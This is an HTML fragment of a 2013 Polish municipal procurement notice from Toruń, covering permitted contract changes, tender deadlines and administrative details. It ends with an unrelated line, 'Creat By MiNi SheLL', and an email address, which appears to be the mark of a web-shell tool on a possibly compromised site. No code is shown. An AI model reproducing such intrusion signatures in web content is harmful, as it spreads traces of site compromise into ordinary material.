<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne jest dokonanie zmian umowy:
1)jeżeli zmiana  umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie: 
a)zmiany  technologii  wykonawstwa robót,
b)zamiany materiałów przewidzianych do wykonania robót określonych w § 1 wzoru umowy,
c)innych nie wymienionych zmian korzystnych dla Zamawiającego,
2) jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu  zamówienia    z przyczyn niezależnych od którejkolwiek ze stron,  które w szczególności dotyczyć będą:
a) uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie projektowania zadania z przyczyn niezależnych od obu stron,
b) z innych przyczyn leżących po stronie Zamawiającego.
3) jeżeli zmiana umowy dotyczyć będzie konieczności wprowadzenia do zakresu przedmiotu umowy ewentualnych opracowań dodatkowych lub zamiennych, w szczególności wynika-jących z zaistniałych na etapie projektowania nieprzewidzianych uwarunkowań technicznych, formalno-prawnych,  których nie można było przewidzieć w  chwili zawarcia umowy,  z ewentualną korektą wynagrodzenia ustaloną na podstawie negocjacji stron. 

Do każdej propozycji zmiany, inicjujący zmianę przedstawi: 
- opis propozycji zmiany, w tym wpływ na terminy wykonania,
- uzasadnienie zmiany,
- obliczenia uzasadniające ewentualną zmianę wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inwestycj i Remontów
ul. Wały gen. Sikorskiego 10
87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 09:00, miejsce: Wydział Inwestycj i Remontów
ul. Wały gen. Sikorskiego 10 - sekretariat 
87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com